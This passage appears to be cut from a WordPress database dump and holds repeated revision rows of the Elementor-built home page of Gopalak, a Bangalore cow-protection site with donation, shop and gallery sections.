on-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 11:13:23','2022-10-28 05:43:23','',1373,'https://gopalak.in/?p=2007',0,'revision','',0),(2008,1,'2022-10-28 11:13:23','2022-10-28 05:43:23','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 11:13:23','2022-10-28 05:43:23','',1373,'https://gopalak.in/?p=2008',0,'revision','',0),(2009,1,'2022-10-28 11:13:23','2022-10-28 05:43:23','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, 